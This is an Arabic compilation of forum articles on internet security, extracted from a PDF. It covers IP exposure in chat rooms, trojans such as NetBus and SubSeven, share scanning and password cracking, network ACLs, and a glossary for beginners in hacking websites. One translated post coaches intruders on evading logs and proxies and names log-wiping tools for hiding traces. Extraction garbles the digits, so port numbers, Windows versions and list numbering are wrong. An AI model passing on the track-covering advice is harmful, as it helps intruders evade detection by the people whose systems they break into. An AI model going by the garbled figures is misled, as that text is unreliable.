                                                                                          ‫(بالشكل التالي‬
                                                                             ‫333.666.222.‪XXX‬‬
                                                                                    ‫) وهذا فيه نوع من‬
                                                                             ‫الحماية للمستخدمين حتى‬
                                                                                  ‫ال يتمكن الهاكرز من‬
                                                                                ‫معرفة رقم الـ‪ IP‬الكامل‬
                                                                                      ‫للمستخدم ومن ثم‬
                                                                               ‫استخدامه للوصول إليه.‬

                                                                                   ‫هناك استثناءان لهذا‬
                                                                                  ‫النظام، حيث يمكن ألي‬
                                                                                   ‫شخص آخر في نظام‬


                                                  ‫11‬
                                              ‫المحادثة معرفة رقم ‪ IP‬الكامل الخاص بك, وهما كالتالي:‬
  ‫2. في حالة كون الشخص مشرفا على الغرفة التي دخلت بها (المشرف هو الشخص الذي أنشأ الغرفة أو‬
‫الشخص الذي تم منحه الصالحية من قبل من أنشأ الغرفة)، حيث أن المشرف يحصل على رقم الـ ‪ IP‬الكامل‬
                                                                             ‫لكل شخص دخل غرفته.‬
       ‫6. في حالة تبادلك الملفات مع شخص في نظام المحادثة: فمزود المحادثة يقوم بدور الوسيط في نقل‬
  ‫النصوص فقط، أما في حالة نقل الملفات فإنه يقوم بإعطاء كال الجهازين رقم الـ‪ IP‬الخاص بالجهاز اآلخر‬
                                                        ‫بحيث يقومان بنقل البيانات بينهما بشكل مباشر.‬
   ‫مما ذكر أعاله، احذر من الدخول للغرف التي تكون مخصصة للهاكرز، حيث أنه المشرف (وهو هاكر في‬
     ‫الغالب) سيحصل على رقم ‪ IP‬الخاص بك مباشرة مما يعرض جهازك لخطر االختراق. وأيضا احذر من‬
  ‫استقبال الملفات ممن ال تعرفهم أو ممن يعرض عليك إرسال الملفات بدون سبب، ألن غرضه الوحيد ربما‬
                                                          ‫يكون الحصول على رقم اآلي بي الخاص بك.‬


                                                                                 ‫من صاحب الموقع ؟‬
     ‫البد أنك قد زرت موقعا وأعجبك، وتساءلت في نفسك من هو صاحب هذا الموقع (سواء كان شخصا أو‬
                                           ‫مؤسسة) ال داعي ألن تحتار بعد اآلن فيكفي أن تذهب للموقع‬
‫/‪www.networksolutions.com/cgi-bin/whois/whois‬وتقوم بإدخال اسم الموقع من دون‬
  ‫( ‪www‬مثل) ‪ wagait.com‬وستحصل على اسم الشخص الذي قام بتسجيل الموقع وعنوانه البريدي‬
‫ورقم هاتفه والفاكس وغيرها من المعلومات األخرى المتعلقة بالموقع. بالطبع فهذه المعلومات قد قام صاحب‬
                                                         ‫الموقع بإدخالها عندما قام بحجز اسم الموقع .‬




                                                            ‫قائمة ببعض المنافذ والتطبيقات المقابلة لها‬

         ‫التطبيق المقابل‬             ‫المنفذ‬                     ‫التطبيق المقابل‬            ‫المنفذ‬


                                                ‫21‬
           ‫تروجان‬      ‫73313‬                             ‫‪FTP‬‬       ‫12‬
    ‫‪BackOrifice‬‬
‫برنامج ‪Netmeeting‬‬   ‫3051,0271‬              ‫ارسال بريد الكتروني‬           ‫52‬
                                                        ‫‪SMTP‬‬
     ‫المحادثة ‪Chat‬‬     ‫7666‬                         ‫ويب ‪Web‬‬              ‫08‬
   ‫43002,54321 تروجان ‪NetBus‬‬               ‫استقبال بريد الكتروني‬        ‫011‬
                                                       ‫3‪POP‬‬
                                              ‫مشاركة ملفات في‬           ‫931‬
                                                         ‫ويندوز‬



                                ‫انتهى،،،‬




                                  ‫31‬
      ‫"مفاهيم خاصة بشبكات اإلنترنت (الجزء الثاني)"‬

  ‫لكي تعرف كيف تحمي نفسك من أي خطر يجب أوال أن تعرف ما هو هذا الخطر ومن ثم يصبح بإمكانك أن‬
‫تعرف كيف تحمي نفسك من هذا الخطر، فمثال لكي نحمي أنفسنا من اللصوص، يجب أن نعرف خطرهم. ومن‬
     ‫ثم يجب أن نعرف كيف نتقي شرهم، فنحن نقفل األبواب لمعرفتنا أن اللصوص قد يدخلون منها في حال‬
  ‫تركناها مفتوحة. كذلك هو الحال بالنسبة للحاسب اآللي، فلكي تعرف كيف تحمي نفسك من شرور الهاكرز،‬
             ‫يجب أن تعرف كيف يقومون باختراق جهازك، وما هي األبواب التي يدخلون منها إلى أجهزتنا.‬

   ‫في الحلقة السابقة تكلمنا عن بعض مصطلحات ومفاهيم الشبكات، والتي تساعدك على معرفة ما سنتحدث‬
‫عنه في هذه الحلقة وهي الطرق والبرامج التي تمكن المخترقين (الهاكرز) من القيام بعملية االختراق ألجهزة‬
  ‫المستخدمين لشبكة اإلنترنت، سواء كان هذا االختراق لغرض التجسس وسرقة الملفات أو لغرض التخريب‬
       ‫ومسح الملفات. بالطبع فإننا سنلمح لهذه البرامج تلميحا، ولن نذكر أسماءها وذلك حتى ال يتم إساءة‬
                                                                                           ‫استغاللها.‬

                                                                        ‫2- الفيروسات (‪:)Viruses‬‬
     ‫عندما يتم التحدث عن األخطار الموجودة في الحاسب اآللي، تتوجه أذهان المستمعين تلقائيا للتفكير في‬
     ‫الفيروسات، نظرا النتشارها وقوة تأثيرها التخريبية على أجهزة الحاسب اآللي. ولعله من المناسب عدم‬
        ‫اإلطالة في الحديث عن الفيروسات، فالغالبية (إن لم يكن الكل) يعرفون خطرها وتأثيرها على أجهزة‬
                                                                                       ‫المستخدمين.‬

                                                                         ‫6- التروجان (‪:)Trojans‬‬
    ‫التروجان أو أحصنة طروادة هي البرامج التي يكون في ظاهرها أنها تقوم بأداء وظيفة مفيدة للمستخدم‬
      ‫ولكنها في الحقيقة وخلف الكواليس تقوم بعمل وظيفة أخرى (غالبا مخربة) بدون علم المستخدم. وقد‬
‫انتشرت هذه النوعية بكثرة في اإلنترنت، نظرا لسهولة انخداع المستخدم بها ونظرا لما تعطيه للمخترقين من‬
                      ‫إمكانيات تصل في بعض األحيان إلى التحكم شبه الكامل في جهاز المستخدم الضحية.‬
‫لعل من أشهر التروجان المنتشرة في اإلنترنت التروجان المسماة بـ "نت باس" ‪ NetBus‬و" باك اوريفيس‬
  ‫" ‪ Back Orifice‬و "سب سيفين " ‪ . SubSeven‬وطريقة عملها متشابهة وهي أن يقوم المخترق‬
‫بإخفاء التروجان في أحد الملفات والتي يقوم المستخدمون اآلخرون بسحبها ظنا منهم بأن هذه الملفات تقوم‬
 ‫بوظائف مفيدة لهم، وعندما يقوم المستخدم بتنفيذ هذا الملف فإنه يقوم وبدون علمه بتركيب خادم للتروجان‬
       ‫داخل جهازه بحيث يتمكن المخترق (باستخدام برنامج عميل للتروجان ‪ )client‬من التحكم في جهاز‬
                                                                                  ‫المستخدم الضحية.‬
       ‫تتشابه هذه التروجان في الوظائف التي تمكن المخترق من القيام بها، وتتراو ح خطورة الوظائف من‬
   ‫التجسس على الجهاز ( مثل سرقة الملفات والبريد اإللكتروني وكلمات السر المختلفة) حتى العبث بجهاز‬
  ‫المستخدم بإخراج األقراص المضغوطة (‪ )CD-ROM‬أو إظهار رسالة مضحكة للمستخدم أو تشغيل ملف‬
                                                        ‫صوت وغيرها من الوظائف األخرى المزعجة.‬




                                                ‫41‬
             ‫صورة تبين واجهة بر نامج نت باس ويظهر فيها الوظائف المختلفة التي يمكن للهاكر القيام بها‬

                                                         ‫-3المشاركة في الطباعة والملفات في ويندوز:‬
‫من المعروف أن نظام ويندوز يسمح للمستخدم بتحديد أحد المجلدات أو األقراص الصلبة في جهازه للمشاركة‬
         ‫من قبل أشخاص آخرين على الشبكة. بالطبع فإن هذه الخاصية مفيدة جدا ولها تطبيقات كثيرة نافعة‬
‫للمستخدم، ولكن عندما تكون متصال باإلنترنت فإن كل من يرى جهازك سيستطيع أن يرى هذه المجلدات التي‬
  ‫وضعتها للمشاركة ويبقى العائق الوحيد للدخول عليها هو الحصول على كلمة السر. طبعا قد تتساءل "كيف‬
   ‫يستطيع اآلخرون الوصول لي ؟ وأنا جهاز ضمن الماليين من األجهزة على اإلنترنت" يؤسفني أن أقول لك‬
   ‫أنه يتوافر الكثير من البرامج (وكما قلنا فلن نذكر أسماءها حتى ال يساء استخدامها ) والتي تمكن للشخص‬
       ‫من البحث عن المجلدات الموضوعة للمشاركة في أجهزة المستخدمين. وبعد الحصول على قائمة بهذه‬
  ‫األجهزة فإنه ما على المخترق إال أن يقوم بتشغيل برنامج يقوم بمحاولة "تخمين" كلمة السر (ويوجد أيضا‬
   ‫الكثير من البرامج من هذا النوع) والتي تقوم بتجريب آالف الكلمات والتي تم تخزينها مسبقا في ملف حتى‬
‫تصل إلى كلمة السر الخاصة بالمجلد الموضوع للمشاركة. وما يزيد الطين بلة أن بعض المستخدمين يقومون‬
      ‫بمشاركة القرص الصلب بكامله !! وبعضهم يستخدم كلمة سر بسيطة من حرف أو حرفين !! مما يسهل‬
                                     ‫المهمة على الهاكر ويجعله يحتار في أي الملفات يسرق وأيها يترك !!‬




                                                ‫51‬
                                                       ‫!‪Error‬‬




                                        ‫أحد البرامج التي تقوم بالبحث عن المجلدات الموضوعة المشاركة‬

                                                                       ‫-4سرقة كلمة السر المخزنة:‬
    ‫يقوم نظام ويندوز بتخزين كلمة السر في ملف وذلك لكي يسترجعها بسرعة في حالة الحاجة إليها، بالطبع‬
     ‫فإن كلمة السر يتم تخزينها بشكل مشفر ، ) ‪(encrypted‬ولكن ال شيء يستعصي على الهاكرز. فحين‬
 ‫حصول الهاكر على هذا الملف (والذي ينتهي باالمتداد ) ‪ PWL‬فإن كلمة السر الخاصة بجهازك هي ملك له‬
 ‫وذلك لوجود العديد من البرامج التي تقوم بفك تشفير هذا الملف والحصول على كلمة السر. بالطبع فإن نظام‬
   ‫ويندوز 08 يحتوي على تشفير أقوى من الذي كان موجودا في نظام ويندوز58 ، ولكنها مسألة وقت حتى‬
                                                   ‫يقوم الهاكرز بإيجاد برنامج يقوم بكسر هذا التشفير.‬

                                                                           ‫5- برامج وتطبيقات اإلنترنت‬
‫إن تطبيقات اإلنترنت ليست مجرد متصفحات فحسب ! بل إن هناك العديد من التطبيقات والبرامج األخرى التي‬
    ‫يتم استخدامها في اإلنترنت. ولكن هذه البرامج قد تحتوي على العديد من الثغرات األمنية التي تكون الباب‬
   ‫المشرع الذي يستخدمه الهاكر للدخول في جهازك و إيذائك ! ومن هذه البرامج برنامج ‪ ICQ‬الشهير الذي‬
 ‫يستخدمه الماليين من المستخدمين في اإلنترنت. وهو يعتبر من أكثر البرامج شعبية بين مستخدمي اإلنترنت‬
     ‫نظرا لما يقدمه من خدمات تسهل التواصل بين المستخدمين. ولكنه أيضا من أكثر البرامج شعبية للهاكرز‬
  ‫نظرا لما يقدمه من إمكانيات للتخريب والعبث بأجهزة ضحاياهم. فيوجد في اإلنترنت العديد من البرامج التي‬
      ‫تقوم بمهاجمة المستخدمين لهذا البرنامج، ويختلف تأثير هذه البرامج من الحصول على رقم ‪ IP‬الخاص‬
  ‫بالمستخدم إلى القيام بإرسال كمية هائلة من البيانات لديه حتى يتوقف الجهاز عن االستجابة للمستخدم مما‬
                                                                     ‫يضطره للقيام بعملية إعادة للتشغيل!‬

                                                                           ‫2- 2- المواقع المشبوهة:‬
‫من فترة ألخرى يتم اكتشاف الكثير من الثغرات األمنية في المتصفحات ويتم استغالل هذه الثغرات بشكل كبير‬
‫من قبل أصحاب مواقع الهاكرز. هذه الثغرات قد تمكن المخترق من الحصول على بعض الملفات والمعلومات‬


                                                 ‫61‬
 ‫الشخصية من جهازك. لذا يجب عليك الحذر عند زيارة المواقع التي يشتبه في كون أصحابها من المخترقين‬
‫نظرا لقدرة أصحاب المواقع على وضع بريمجات في مواقعهم الستغالل الثغرات األمنية في متصفحك والدخول‬
   ‫إلى جهازك. وأبسط األمثلة على ذلك ما يقوم به بعض المخربون من وضع بريمج (‪ )script‬يقوم بتكرار‬
      ‫تشغيل برنامج المتصفح وفتح نوافذ جديدة حتى تنتهي موارد النظام ويصبح ال يستجيب للمستخدم مما‬
  ‫يضطره إلعادة تشغيل الجهاز ! بالطبع فإن هذه الثغرة تم تالفيها في متصفح إنترنت اكسبلورر . وما فوق‬
                                  ‫ولكنها تعطي مثاال بسيطا للتخريب الذي ممكن أن يقوم به المخترقون.‬

                                                                               ‫1- الخدمات اإلضافية:‬
 ‫يشتمل نظام التشغيل على بعض الخدمات اإلضافية التي قد ال يحتاجها المستخدم والتي قد تكون المدخل إلى‬
 ‫جهازك، فمثال بعض اإلصدارات من نظام ويندوز تحتوي على خادم ويب وخادم ‪FTP‬وخادم بريد إلكتروني‬
   ‫)‪(SMTP‬وهي ال تستخدم من قبل غالب المستخدمين ولكنها تحتوي في أغلب األحيان على ثغرات أمنية‬
‫تمكن المخترقين من العبث بجهازك. ويتم دائما إصدار تعديالت لهذه المشاكل األمنية ولكن أغلب المستخدمين‬
    ‫ال يقومون بتركيبها. لذا فمن المستحسن أثناء تركيب نظام التشغيل أن يقوم المستخدم بإلغاء تركيب هذه‬
‫الخدمات عندما ال يكون محتاجا لها وفي حالة كان المستخدم محتاجا لها، فمن المستحسن إيقاف تشغيلها عن‬
 ‫اتصاله باإلنترنت حتى ال يكون المنفذ الذي تعمل عليه هذه البرامج مفتوحا مما يسد الطريق على المخترقين‬
                                                 ‫الذي يريدون استغالل هذه الخدمات للدخول في جهازك.‬


‫بالطبع فإن ما ذكرناه في هذا المقال ال يشمل جميع الطرق التي يستخدمها الهاكرز ، ولكنه كاف إلعطاء فكرة‬
      ‫عن هذه الطرق ورفع درجة الحذر لدى المستخدمين عن اتصالهم باإلنترنت، مما يسهم في التقليل من‬
                                                                         ‫احتمالية تعرضهم لإلختراق.‬
 ‫في العدد القادم بإذن هللا سنقوم بالتحدث عن الطرق والبرامج الدفاعية التي يجب على المستخدم استخدامها‬
                                                                          ‫التقاء الهاكرز و شرورهم.‬

                                             ‫انتهى،،،‬




                                               ‫71‬
                               ‫"األمن عبر اإلنترنت"‬

                                                                          ‫<منقول من منتدى إعصار>‬

                                                                              ‫<الكاتب:‪> JawaDal‬‬

                                                                                   ‫<المترجم:0‪> z3r‬‬


                     ‫هناك الكثير الذي يجب ان تعرفوه قبل ان تفكروا في تعلم اختراق المواقع و السيرفرات‬
                                                                              ‫حسناا 0‪here we G‬‬
  ‫الكثير من الناس يعملوا هاكينج من غير ما يعرفوا.. بيفتحوا ال‪ dos‬او ‪ .shell account‬يكتبوا شويه‬
                                        ‫اوامر و بووم. ‪. it reboots‬ديه مش ثغره!. لقد تم اختراقك!!!‬
              ‫حتى لما تستخدم امر بسيط مثل:‪ftp://hostname/ FTP‬في الدوس عندك و تدوس انتر‬
‫او عندك ‪ GFI LANguard network security scanner‬و عملت سكان على سايت و لقيت كذا‬
‫بورت مفتو ح و منهم بورت 26.. بتدوس عليه و تتصل بالموقع..و نفس الشيئ عن طريق التلنت..هذا يعني‬
                                                                                     ‫انه تم اختراقك!!‬
               ‫ده عشان لما بتعمل ‪ log in‬باوامر ‪ ftp‬بسيطه زي: ‪ ...cd lcd dir ls‬و اي حاجه تانيه‬
                             ‫الن مجرد ماتعمل ‪ log in‬في حاجه اسمها1 )‪LOGS...(LOG.FILES‬‬
                                                                                ‫ايه بقى ال‪ LOG‬ده؟؟‬
    ‫ال‪ log files‬ديه بتسجل كل شئ عن كل شخص اتصل بالجهاز(‪ )loged in‬و يحصلوا على معلومات‬
                                                                                                ‫مثل:‬

                                                                   ‫يرون متى عملت الهاكينج بالضبط‬
                                                                                  ‫من اي موقع اتيت‬
                                                                              ‫فضلت اد ايه‪online‬‬
                                                                ‫ال‪ IP Address‬بتاعك <<<<<<<‬
                                                                    ‫ال‪( host name‬اسم الجهاز)‬
                                                                                             ‫القاره‬
                                                                                             ‫الدوله‬
                                                                                            ‫المدينه‬
                                                                                          ‫المتصفح‬
                                                                                       ‫نظام التشغيل‬
                                                                       ‫ال‪screen resolution‬‬
                                                                                      ‫الوان الشاشه‬
                                                                ‫مزود الخدمه الخاص بك(‪<<<<)ISP‬‬

                                                                ‫هناك 3 انواع ‪ log files‬مهمه:‬
             ‫‪ - WTMP‬يسجل كل دخول\خروج، مع ميعاد الدخول\الخروج باالضافه الى ال‪ host‬و ‪tty‬‬
                                                           ‫‪- UTMP‬من ‪ Onlne‬في هذه اللحظه‬
                                                          ‫‪- LASLOG‬من اي جاء الدخول\خروج‬

     ‫و الكثير الكثير!! لذا لو االدمن اراد ان يلقي نظره عليهم (‪ )log.files‬سوف يوقع بك( ‪track you‬‬
                                                                                 ‫‪... )down‬‬

           ‫ربما تقول: مفيش مشكله انا هاستخدم بروكسي! بس ادي حلجه الزم تعرفها عن البروكسيهات‬
                                  ‫جهازك-->خادم البروكسي-->الموقع--‪--FTP‬تلنت او اي شئ اخر!‬
   ‫لو اخترقت موقع و االدمن عاوز يعرف انت مين.لو معاه شويه فلوس هيعرف!او حتي يخترق البروكسي‬
                                        ‫سيرفر و هيجيبك .. نفس الكالم لو بتستخدم اكثر من بروكسي‬
                    ‫جهازك-->خادم البروكسي االول-->خادم البروكسي الثاني-->الثالث--‪...--so on‬‬
                              ‫يقدر يجيبك بس هيحتاج فلوس كثير و وقت اكثر!!لكن في النهايه يقدر..‬


                                                ‫81‬
                                                      ‫لكن تقدر ايضا تستخدم شيئ اسمه.. -: ‪Wingate‬‬
   ‫‪ Wingate‬هو بروكسي يسمح بمشاركه كونكشن انترنت واحد او اكثر.. فائده ال‪ Wingate‬انه سيخفي‬
                                                                  ‫ال‪ IP‬عن الكمبيوتر الذي ستتصل به!!‬
  ‫لكن لالسف هذا كل ما اعرفه عنه..2 نحتاج بعض االشخاص االذكياء ليعلمونا كيف نستخدمه و اين نجده؟!‬
                                                                             ‫ماذا ايضاا....اممممممــم‬
           ‫اه تذكرت!!.. قبل كل شئ يجب ان تعرف كيف تظل ‪ anonymous‬على ال‪ ..web‬و كيف تؤمن‬
               ‫جهازك؟!!......مثل ال .‪spyware‬استخدم ‪ firewall‬مثل ال . ‪zone alarm‬امسح ملفات‬
‫الهيستوري(كالكوكيز و االنترنت هيستوري و ملفات االنترنت المؤقته..و الملفات الشخصيه و اللوق) انا افعل‬
   ‫هذه االشياء كل يوم قبل ان ادخل عالنت!! لدي برنامج رائع اسمه ‪ windows washer‬يجب ان يكون‬
                                                   ‫عندك., لقد خصلت عليه من المدرسه.. سرقته هاهاها.‬

        ‫و الكثير. اذهب لجوجل و اكتب ‪ how to Stay anonymous on the web‬او ‪how to‬‬
                                                           ‫‪secure to secure my computer‬‬
                         ‫او زور موقع امني جيد و ابحث عن شئ كهذا .. و انا متأكد انك ستجد الكثير ..‬
     ‫و ال تنسى ال‪ Preety Good Privacy (PGP)d‬انه مجاني .. يجب ان يكون عندك لو كنت تريد‬
                                                                     ‫اختراق موقع و تترك ايميلك فيه!‬
                                            ‫تستطيع ان تحصل عليه من: ‪/http://www.pgpi.org‬‬
                          ‫‪ ok‬اظن ان هذا كل ما يمكنني كتابته لكن هناك الكثير لكن يجب ان تبحث عنه!‬

                                                              ‫ارجوا ان يعلمك هذا الدرس شيئا يا اخواني‬

‫لكن لدي سؤال االن .. و لست الوحيد الذي يحتاج االجابه .. هذه االجابه يجب ان يعرفها الجميع قبل ان يتعلم‬
                                                                                              ‫الهاكينج‬

                                                          ‫2-كيف تستخدم ال‪ wingate‬؟ و اين نجده؟‬
      ‫كيف نمسح اللوقز؟ و كيف نجدهم؟ و كيف نتأكد ان كل شئ على ما يرام؟!و كيف نتأكد اننا لم نترك اي‬
                                                                                ‫اثار‪ tracks‬خلفنا؟‬
                                                       ‫ها هو برنامج اعرفه: و اسمه ‪log modifier‬‬
       ‫‪ah-1_0b.tar clear.c cloak2.c invisible.c marryv11.c wzap.c wtmped.c‬‬
                                                                                           ‫‪zap.c‬‬
               ‫==================================================‬

                               ‫==========================================‬
     ‫هذا يا اخي كل ما عرفته في اخر اسبوعين. و سألت سؤالين او اكثر عن كيفيه البقاء ‪anonymous‬‬
  ‫عالنت و عن استخدام البروكسيز و بعض الناس جاوبوني. لكن بالنهايه ليس المهم كم سؤال سألت .. يجب‬
    ‫ان تجد االجابه هذا هو المهم.!!! لذا ارجو يا اخي ان تبحث في هذا المجال اوال ثم بعدها تتعلم االختراق.‬

                                               ‫انتهى،،،‬




                                                 ‫91‬
                                    ‫"أمن الشبكات"‬

                                                                           ‫<منقول من منتدى إعصار>‬

                                                                                     ‫<الكاتب:الجوكر>‬

                                          ‫فى هذا الموضووع سأتناول بعض طرق الحماية نقال عن كتاب .‬
                                                              ‫وهذا إلفتقار هذا القسم لمواضيع مثل هذه .‬
                                                                        ‫لذلك أرجو سماع وزاع ضميركم.‬
                                               ‫--------------------------------------------------------‬
                       ‫2- عرض لبعض المخاطر األمنية التي قد تتعرض لها الشبكة و كيفية الوقاية منها.‬
                                                             ‫6- وصف لعالقة الولوج الى الشبكة بأمنها.‬
                                                      ‫3- كيفية حماية الموارد بواسطة تراخيص الوصول.‬
                                                                              ‫.- شر ح لمكونات .‪ACL‬‬
                                                                     ‫5- شر ح لعملية تفحص التراخيص.‬

                                          ‫أي شبكة قد تكون عرضة للوصول غير المرخص ألي مما يلي:‬

                                                                                           ‫2- المعدات.‬

                                                                                           ‫3- البيانات.‬

                                                                                    ‫3- عمليات الشبكة.‬

                                                                                           ‫.- الموارد.‬

                               ‫تعتمد درجة أمن الشبكة على مدى حساسية البيانات المتداولة عبر الشبكة.‬

   ‫و يتم تنظيم األمن وفقا لنوع الشبكة ، ففي شبكات الند للند كل جهاز يتحكم في أمنه الخاص ، بينما يتحكم‬
                                                                ‫المزود في أمن شبكات الزبون المزود.‬

                                     ‫و هناك بعض اإلجراءات التي تساعد في المحافظة على أمن الشبكة:‬

                                        ‫2- التدريب المتقن للمستخدمين على التعامل مع إجراءات األمن.‬

                               ‫6- التأكد من أمن المعدات و صعوبة الوصول اليها من قبل غير المخولين.‬

                       ‫3- حماية األسالك النحاسية و إخفاءها عن األعين ألنها قد تكون عرضة للتجسس.‬

     ‫.- تشفير البيانات عند الحاجة أما مقاييس التشفير فتضعها وكالة األمن الوطني األمريكية ‪National‬‬
                                                               ‫.)‪Security Agency (NSA‬‬

‫5- تزويد المستخدمين بأجهزة ال تحتوي على محركات أقراص مرنة أو مضغوطة أو حتى أقراص صلبة ، و‬
‫تتصل هذه األجهزة بالمزودات باستخدام رقاقة إقالع ‪ ROM Boot Chip‬و عند تشغيل هذه األجهزة يقوم‬
                                ‫المزود بتحميل برنامج اإلقالع في ذاكرة ‪ RAM‬للجهاز ليبدأ بالعمل.‬

         ‫2-استخدام برامج لتسجيل جميع العمليات التي يتم إجراؤها على الشبكة لمراجعتها عند الضرورة.‬

‫1- إعطاء تصاريح ‪ Permissions‬للمستخدمين للوصول للبيانات و المعدات كل حسب طبيعة عمله و في‬
                            ‫هذه الحالة يجب مشاركة البيانات و المعدات للسما ح لآلخرين باستخدامها.‬


                                                ‫02‬
    ‫0- تزويد المستخدمين بحقوق ‪ Rights‬تحدد األنشطة و العمليات المسمو ح لهم إجراءها على النظام.‬

                                                    ‫هناك نظامان أساسيان إلعطاء التصاريح و الحقوق :‬

                                                                   ‫2- المشاركة المحمية بكلمة مرور.‬

                                                                                ‫6- تصاريح الوصول.‬

‫في النظام األول يتم تعيين كلمة سر لكل من الموارد المطلوب مشاركتها و يتم الوصول لهذه الموارد فقط من‬
                                                                          ‫قبل من لديه كلمة السر.‬

   ‫كما تستطيع تحديد درجة الوصول هل هي للقراءة فقط أم وصول كامل أم وفقا لكلمة السر.أنظر الصورة.‬




  ‫في النظام الثاني يتم تعيين الحقوق و إعطاء التصاريح لكل مستخدم أو مجموعة مستخدمين ، و يكفي أن‬
    ‫يدخل المستخدم كلمة المرور عند الدخول الى نظام التشغيل ليتعرف النظام على حقوق هذا المستخدم و‬
‫التصاريح المتوفرة له، و يعتبر هذا النظام أكثر أمنا من النظام السابق و يعطي مدير الشبكة تحكما أكبر بكل‬
                                                                                             ‫مستخدم.‬

           ‫عند إدخال اإلسم و كلمة المرور يتم تمرير هذه المعلومات الى مدير أمن الحسابات ‪Security‬‬
    ‫)‪Accounts Manager (SAM‬فإذا كان الولوج الى جهاز ‪ Workstation‬فإن المعلومات يتم‬
 ‫مقارنتها مع قاعدة بيانات حسابات األمن المحلية في الجهاز، أما إذا كان الولوج الى نطاق ‪ Domain‬فإن‬


                                               ‫12‬
      ‫المعلومات يتم إرسالها الى مزود ‪ SAM‬الذي يقارنها مع قاعدة بيانات حسابات النطاق، فإذا كان اسم‬
‫المستخدم أو كلمة المرور غير صالحين فإن المستخدم يمنع من الدخول الى النظام، أما إذا كانا صحيحين فإن‬
  ‫نظام األمن الفرعي يقوم بإصدار بطاقة ولوج ‪ Access Token‬تعرف النظام بالمستخدم فترة ولوجه و‬
                                                            ‫تحتوي هذه البطاقة على المعلومات التالية:‬

                  ‫2- المعرف األمني )‪ Security Identifier (SID‬و هو رقم فريد خاص بكل حساب.‬

            ‫6- معرفات المجموعة ‪ Group SIDs‬و هي التي تحدد المجموعة التي ينتمي لها المستخدم.‬

                                    ‫3- اإلمتيازات ‪ Privileges‬و هي تمثل الحقوق الممنوحة لحسابك.‬

 ‫كما أنه يتم إصدار ‪ Access Token‬عند محاولتك اإلتصال من جهازك بجهاز آخر على شبكتك و يطلق‬
                                          ‫على هذا اإلجراء الولوج عن بعد .‪Remote Logon‬‬

 ‫من األمور التي يجب مراعاتها عند الحديث عن أمن الشبكة هو المحافظة على أمن الموارد مثل الطابعات و‬
              ‫محركات األقراص و الملفات و التي يقوم مدير الشبكة بتعيين تصاريح إلستخدام هذه الموارد.‬

                                             ‫و من التصاريح التي قد تعطى للوصول الى الملفات ما يلي:‬

                                                  ‫2- تصريح قراءة و يسمح لك بعرض و نسخ الملفات.‬

                                                                          ‫6- تصريح تنفيذ للتطبيقات.‬

                                                 ‫3- تصريح كتابة و يسمح بالتعديل في محتوى الملفات.‬

                                                                ‫.- ممنوع اإلستخدام .‪No Access‬‬

                            ‫و التصاريح ممكن منحها لمستخدم أو مجموعة من المستخدمين و هذا أٍسهل.‬

 ‫يمتلك كل مورد من الموارد قائمة تحكم بالوصول )‪ Access Control List (ACL‬و كل معلومة يتم‬
                         ‫إدخالها في ‪ ACL‬يطلق عليها .)‪Access Control Entry (ACE‬‬

‫يتم إنشاء ‪ ACE‬عند منح التصريح إلستخدام المورد و تحتوي على ‪ SID‬للمستخدم أو مجموعته الممنوحة‬
   ‫التصريح باإلضافة الى نوع التصريح، فلو افترضنا أن مدير مجموعة ما قد منح تصريح قراءة و تصريح‬
                          ‫ُ‬
  ‫كتابة لملف ما فإن ‪ ACE‬جديد يتم إنشاؤه ثم إضافته الى ‪ ACL‬الخاص بالملف و سيحتوي ‪ ACE‬على‬
                                  ‫‪SID‬لمدير المجموعة باإلضافة الى تصريح قراءة و تصريح كتابة.‬

                                                                              ‫هناك نوعان ل : ‪ACE‬‬

                                                          ‫2- الوصول مسمو ح .‪AccessAllowed‬‬

    ‫6- الوصول ممنوع ‪ AccessDenied‬و يتم إنشاؤها إذا كان تصريح الوصول هو .‪No Access‬‬

‫و هكذا عندما يحاول مستخدم ما الوصول الى مورد ما يتم مقارنة ‪ SID‬الخاص به مع ‪ SIDs‬في كل ‪ACE‬‬
                                                                        ‫من ‪ ACL‬للمورد.‬

       ‫في ويندوز ‪ NT‬و ويندوز 2226 يتم ترتيب ‪ ACE‬بحيث تكون ‪ AccessDenied ACEs‬قبل‬
      ‫، ‪AccessAllowed ACEs‬فإذا وجد ‪ SID‬خاصتك في أي من ‪AccessDenied ACEs‬‬
      ‫فستمنع من الوصول الى المورد و إال فسيبحث في ‪ AccessAllowed ACEs‬للتأكد من الحقوق‬
   ‫الممنوحة لك فإن لم يعثر على ‪ SID‬مطابق لخاصتك فستعرض رسالة تحذير تمنعك من الوصول للمورد.‬


                                                ‫22‬
                                                                                  ‫ملخص الدرس:‬

                            ‫هناك بعض اإلجراءات التي يجب اتخاذها للمحافظة على أمن الشبكة و منها:‬
‫تدريب المستخدمين ، حماية المعدات ، تشفير البيانات ، استخدام أجهزة عديمة األقراص ، مراقبة العمليات‬
                                                                            ‫التي تجرى على الشبكة.‬

                                                  ‫هناك نظامان أساسيان إلعطاء التصاريح و الحقوق :‬

                                                                 ‫2- المشاركة المحمية بكلمة مرور.‬

                                                                             ‫6- تصاريح الوصول.‬

                                           ‫انتهى،،،‬




    ‫"مصطلحات مهمة للمبتدئين في اختراق المواقع"‬


                                             ‫32‬
                                                                                     ‫<منقول>‬

                                                                          ‫<الكاتب:‪>BeReal‬‬

                                                                                  ‫السالم عليكم‬

                      ‫لقد اعددت هذا الملف الخواني المبتدئين في تعلم طرق اختراق المواقع ، فقد‬

                       ‫تواجههم بعض الكلمات التي قد تكون غريبة عليهم و التي قد ال يفهمونها ،‬

                      ‫و بالتالي تشكل لهم بعض العواقب في مواصلة الفهم و التعلم . فاهلل الموفق.‬

‫===========================================================‬
                                                 ‫==========‬

                 ‫تلنت (‪ -:)Telnet‬و هو برنامج صغير موجود في الويندوز . و هو يعمل ككالينت‬

                  ‫أو وضعيته تكون دائما كزبون . أي أن باستطاعة هذا البرنامج اإلتصال بالسيرفر‬

                 ‫أوالخادم و اجراء بعض العمليات كل حسب مستواها و حالتها . يستخدمه الهاكرز‬

                       ‫غالبا لمعرفة نظام تشغيل الموقع و السيرفر التابع له ، و لإلتصال بالسيرفر‬

             ‫عبر بورت معين و خصوصا بورت اإلف تي بي (26) للدخول الى الموقع بطريقة خفية‬

       ‫‪ Anonymous Mode‬لعرض ملفات الموقع و سحب ملف الباسورد او غيره من البيانات.‬

         ‫الستخدام البرنامج ، اذهب الى ‪ Start ==> Run ==> telnet‬و ستظهر شاشة التلنت.‬

                       ‫------------------------------------------------------------------------‬



               ‫برامج السكان أو ‪ -:Scanner‬و هي برامج موجودة للمسح على المواقع و كشف‬

                      ‫ثغراتهاإن وجدت ، فهي سريعة، كما أنها تملك قاعدة بيانات واسعة و كبيرة‬

